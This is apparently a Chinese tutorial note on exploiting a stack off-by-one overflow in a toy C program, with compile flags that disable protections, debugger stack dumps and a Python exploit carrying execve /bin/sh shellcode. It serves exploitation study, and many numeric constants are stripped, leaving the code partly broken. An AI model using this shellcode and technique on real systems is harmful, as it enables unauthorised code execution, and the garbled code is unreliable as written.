Linux漏洞分析入门笔记-Off-By-One(栈)
ubuntu-16.04.5(X86)
IDA7.0
0x00.漏洞描述
1.什么是off by one?又称1字节溢出。
源字符串长度等于目标缓冲区长度时,将源字符串复制到目标缓冲区可能会导致off by one。
当源字符串长度等于目标缓冲区长度时,NULL字节将被复制到目标缓冲区上方。这里由于目标缓冲区位于堆栈中,所以单个NULL字节可以覆盖存储在堆栈中的调用者的EBP的最低位(1字节),这可能导致任意的代码执行。
0x01.漏洞分析
1.示例代码:
#include <stdio.h>
#include <string.h>
void foo(char* arg);
void bar(char* arg);
void foo(char* arg) {
bar(arg); /* [1] */
}
void bar(char* arg) {
char buf[];
strcpy(buf, arg); /* [2] */
}
int main(int argc, char *argv[]) {
if(strlen(argv[])>) { /* [3] */
printf("Attempted Buffer Overflow\n");
fflush(stdout);
return -;
}
foo(argv[]); /* [4] */
return ;
}
编译生成目标文件:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o vuln vuln.c
上述示例代码的第[2]行是可能发生off by one溢出的地方。目标缓冲区长度为256,因此长度为256字节的源字符串可能导致任意代码执行。
2.如何产生任意代码执行?动态调试,如下图1所示,拷贝字符串前栈情况。

图1
如果调用foo者的EBP位于目标缓冲区之上,则在strcpy之后,单个NULL(0x00)字节将覆盖调用者EBP的最后一个字节,如图2所示。

图2
构造poc
//偏移
0xBFFFEF00-0xBFFFEE58+0x4=0xAC
python -c "print 'A' * 172 + 'B' * 4 + 'C' * 80"
执行strcpy之后,存储在目标缓冲区buf之上的EBP被一个NULL(0x00)字节所覆盖,ebp从0xBFFFEF64变为0xBFFFEF00(可对比图1图2)。从调试器堆栈布局我们可以看到堆栈位置0xBFFFEF00是目标缓冲区buf的一部分。
//拷贝前栈
BFFFEE58 F63D4E2E
BFFFEE5C B7E0CF12 libc_2..so:B7E0C
BFFFEE60 000008EA
BFFFEE64 B7E16618 libc_2..so:B7E16
BFFFEE68 B7E15DC8 libc_2..so:B7E15
BFFFEE6C 07B1EA71
BFFFEE70 B7FF7AC4 ld_2..so:__get_c
BFFFEE74 BFFFEF20 [stack]:BFFFEF20
BFFFEE78 B7FF59F3 ld_2..so:__get_c
BFFFEE7C B7FD5470 debug003:B7FD5470
BFFFEE80
BFFFEE84
BFFFEE88 B7FFF000 ld_2..so:B7FFF00
BFFFEE8C B7FFFC08 ld_2..so:_r_debu
BFFFEE90
BFFFEE94
BFFFEE98
BFFFEE9C BFFFEF2C [stack]:BFFFEF2C
BFFFEEA0 B7FE3FC9 ld_2..so:_dl_rtl
BFFFEEA4
BFFFEEA8 B7FFFAD0 ld_2..so:_r_debu
BFFFEEAC BFFFEF28 [stack]:BFFFEF28
BFFFEEB0 BFFFEF70 [stack]:BFFFEF70
BFFFEEB4 B7FE4B4B ld_2..so:_dl_rtl
BFFFEEB8 LOAD:
BFFFEEBC BFFFEF28 [stack]:BFFFEF28
BFFFEEC0 B7FFFA74 ld_2..so:_r_debu
BFFFEEC4
BFFFEEC8 B7FD54A0 debug003:B7FD54A0
BFFFEECC
BFFFEED0
BFFFEED4
BFFFEED8 B7FFF918 ld_2..so:_r_debu
BFFFEEDC 00F0B5FF
BFFFEEE0 BFFFEF1E [stack]:BFFFEF1E
BFFFEEE4
BFFFEEE8 000000C2
BFFFEEEC B7E996BB libc_2..so:strer
BFFFEEF0 BFFFEF1E [stack]:BFFFEF1E
BFFFEEF4 BFFFF020 [stack]:BFFFF020
BFFFEEF8 000000E0
BFFFEEFC
BFFFEF00 B7FFF000 ld_2..so:B7FFF00
BFFFEF04 B7FFF918 ld_2..so:_r_debu
BFFFEF08 BFFFEF20 [stack]:BFFFEF20
BFFFEF0C LOAD:aLibcStartMai
BFFFEF10
BFFFEF14 BFFFEFB4 [stack]:BFFFEFB4
BFFFEF18 B7FBB000 libc_2..so:B7FBB
BFFFEF1C 0000FF17
BFFFEF20 FFFFFFFF
BFFFEF24 0000002F
BFFFEF28 B7E15DC8 libc_2..so:B7E15
BFFFEF2C B7FD51B0 debug003:B7FD51B0
BFFFEF30
BFFFEF34 08049FF4 .got.plt:_GLOBAL_O
BFFFEF38
BFFFEF3C _init_proc+
BFFFEF40
BFFFEF44
BFFFEF48 08049FF4 .got.plt:_GLOBAL_O
BFFFEF4C __libc_csu_init+
BFFFEF50 B7FBB000 libc_2..so:B7FBB
BFFFEF54 B7FBB000 libc_2..so:B7FBB
BFFFEF58 BFFFEF64 [stack]:BFFFEF64
BFFFEF5C foo+
BFFFEF60 BFFFF20D [stack]:BFFFF20D
BFFFEF64 BFFFEF78 [stack]:BFFFEF78
BFFFEF68 080484F9 main+
BFFFEF6C BFFFF20D [stack]:BFFFF20D
//拷贝后栈
BFFFEE58
BFFFEE5C
BFFFEE60
BFFFEE64
BFFFEE68
BFFFEE6C
BFFFEE70
BFFFEE74
BFFFEE78
BFFFEE7C
BFFFEE80
BFFFEE84
BFFFEE88
BFFFEE8C
BFFFEE90
BFFFEE94
BFFFEE98
BFFFEE9C
BFFFEEA0
BFFFEEA4
BFFFEEA8
BFFFEEAC
BFFFEEB0
BFFFEEB4
BFFFEEB8
BFFFEEBC
BFFFEEC0
BFFFEEC4
BFFFEEC8
BFFFEECC
BFFFEED0
BFFFEED4
BFFFEED8
BFFFEEDC
BFFFEEE0
BFFFEEE4
BFFFEEE8
BFFFEEEC
BFFFEEF0
BFFFEEF4
BFFFEEF8
BFFFEEFC
BFFFEF00
BFFFEF04
BFFFEF08
BFFFEF0C
BFFFEF10
BFFFEF14
BFFFEF18
BFFFEF1C
BFFFEF20
BFFFEF24
BFFFEF28
BFFFEF2C
BFFFEF30
BFFFEF34
BFFFEF38
BFFFEF3C
BFFFEF40
BFFFEF44
BFFFEF48
BFFFEF4C
BFFFEF50
BFFFEF54
BFFFEF58 BFFFEF00 [stack]:BFFFEF00
BFFFEF5C foo+
BFFFEF60 BFFFF20D [stack]:BFFFF20D
BFFFEF64 BFFFEF78 [stack]:BFFFEF78
BFFFEF68 080484F9 main+
BFFFEF6C BFFFF20D [stack]:BFFFF20D
3.根据栈回溯,可以控制这个堆栈位置(0xBFFFEF00),因此他控制指令指针(eip )使用他可以实现任意代码执行,如图3图4。

图3

图4
leave指令相当执行了两条指令 mov ebp, esp; pop ebp,而EPB后面刚好是函数返回地址,再执行ret指令时EIP就指向了攻击者可以控制返回地址。
4.Poc编写获取shell
#!/usr/bin/env python
import struct
from subprocess import call
#execve(/bin/sh)
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90"
ret_addr = 0xBFFFEF18
def conv(num):
return struct.pack("<I",num)
buf = "A" *
buf += conv(ret_addr)
buf += "\x90" *
buf += shellcode
buf += "\x90" *
print "Calling program"
call(["./vuln", buf])

图5
图5所示,成功获取shell。
0x02.总结
1.如果堆栈是随机的就不能成功利用,每次大小都是不一样的,很难固定shellcode的位置,所以关闭了ASLR。还有就是被溢出的地址必须得是buf的地址才能有机会成功。
Linux漏洞分析入门笔记-Off-By-One(栈)的更多相关文章
- Linux漏洞分析入门笔记-CVE-2015-0235
Ubuntu 12.04 32位 ida 7.0 0x00:漏洞描述 1.glibc的__nss_hostname_digits_dots存在缓冲区溢出漏洞,导致使用gethostbyname系列函数 ...
- Linux漏洞分析入门笔记-CVE_2018_6323_整型溢出
操作系统 Ubuntu 16.04 /32 位 调试器 IDA pro 7.0 漏洞软件 binutils-2.29.1 0x00: 漏洞描述 1.什么是整数溢出: 在计算机中,整数分 ...
- linux漏洞分析入门笔记-bypass_PIE
ubuntu 16.04 IDA 7.0 docker 0x00:漏洞分析 1.ASLR的是操作系统的功能选项,作用于executable(ELF)装入内存运行时,因而只能随机化stack.heap. ...
- linux漏洞分析入门笔记-栈溢出
ida7.0 ubuntu16.04 lts 0x00:环境配置 使用IDA远程调试Linux程序步骤如下: 1. 在进行远程调试之前需要对Linux平台进行一些准备工作.在IDA的安装目录中的dbg ...
- Linux内核分析课程笔记(一)
linux内核分析课程笔记(一) 冯诺依曼体系结构 冯诺依曼体系结构实际上就是存储程序计算机. 从两个层面来讲: 从硬件的角度来看,冯诺依曼体系结构逻辑上可以抽象成CPU和内存,通过总线相连.CPU上 ...
- linux内核分析课程笔记(二)
运行一个精简的操作系统内核 存储程序计算机是几乎所有计算机的基础逻辑框架. 堆栈是计算机中非常基础的东西,在最早计算机没有高级语言时,在高级语言出现之前,我们没有函数的概念.但高级语言出现后有了函数调 ...
- Linux内核分析 读书笔记 (第十八章)
第十八章 调试 18.1 准备开始 1. 需要的只是: 一个bug 一个藏匿bug的内核版本 相关内核代码的知识和运气 2. 在跟踪bug的时候,掌握的信息越多越好. 18.2 内核中的bug 1. ...
- Linux内核分析 读书笔记 (第四章)
第四章 进程调度 调度程序负责决定将哪个进程投入运行,何时运行以及运行多长时间.进程调度程序可看做在可运行态进程之间分配有限的处理器时间资源的内核子系统.只有通过调度程序的合理调度,系统资源才能最大限 ...
- Linux内核分析 读书笔记 (第七章)
第七章 链接 1.链接是将各种代码和数据部分收集起来并组合成为一个单一文件的过程,这个文件可被加载(或被拷贝)到存储器并执行. 2.链接可以执行于编译时,也就是在源代码被翻译成机器代码时:也可以执行于 ...
随机推荐
- Qt 学习之路 2(64):使用 QJsonDocument 处理 JSON
Home / Qt 学习之路 2 / Qt 学习之路 2(64):使用 QJsonDocument 处理 JSON Qt 学习之路 2(64):使用 QJsonDocument 处理 JSON 豆子 ...
- java 关于数组 计数的面试题
题目:用面向对象的方法求出数组中重复 value 的个数 : 1 出现:1 次3 出现:2 次8 出现:3 次2 出现:4 提供数组 : int[] arr = {1,4,1,4,2,5,4,5 ...
- bzoj4034 树上操作 树链剖分+线段树
题目传送门 题目大意: 有一棵点数为 N 的树,以点 1 为根,且树点有权.然后有 M 个操作,分为三种: 操作 1 :把某个节点 x 的点权增加 a . 操作 2 :把某个节点 x 为根的子树中所有 ...
- vm中centos7磁盘扩容
在VM虚拟平台管理客户端,将虚拟机关机后,将分配的磁盘大小30G扩至300G.如图. 调整完后,重新打开虚拟机,使用fdisk -l查看,可以看到我们刚刚扩容的空间已经可以看到,但没有分区,还 ...
- 经常谈到Oracle的权限,你究竟知道多少
作者: 三十而立 时间:2009年10月28日 9:41:15 请尊重原创作品.转载请保持文章完整性,并以超链接形式注明原始作者"inthirties(三十而立)" 接着上面谈到的 ...
- centos7安装nslookup工具、ntp工具
2018-12-13 centos7安装nslookup工具 yum install bind-utils -y DNS解析localhost到本机 # .检测 [root@node2 ~]# nsl ...
- js - cannot set property xxx of undefined
for(let i=0;i<=res.data.length;i++){ res.data[i]['class'] = 'biaoqian-red'; } console.log(res.dat ...
- spark第十八篇:Tuning Spark 调优
由于大多数Spark应用都是在内存中计算的,所以,Spark程序的瓶颈可能是集群中的任何资源,比如CPU,网络带宽或者内存等.本指南主要涵盖两个主题: 1.数据序列化.这对于良好的网络性能至关重要,还 ...
- 从指定Dictionary中移除指定值项
void Removeltems(Dictionary<int, ltem> _dicltemMap, ltem _item) { List<ltem> keys=new Li ...
- ClouderManger搭建大数据集群时ERROR 2003 (HY000): Can't connect to MySQL server on 'ubuntucmbigdata1' (111)的问题解决(图文详解)
问题详情 相关问题的场景,是在我下面的这篇博客里 Cloudera Manager安装之利用parcels方式(在线或离线)安装3或4节点集群(包含最新稳定版本或指定版本的安装)(添加服务)(Ubun ...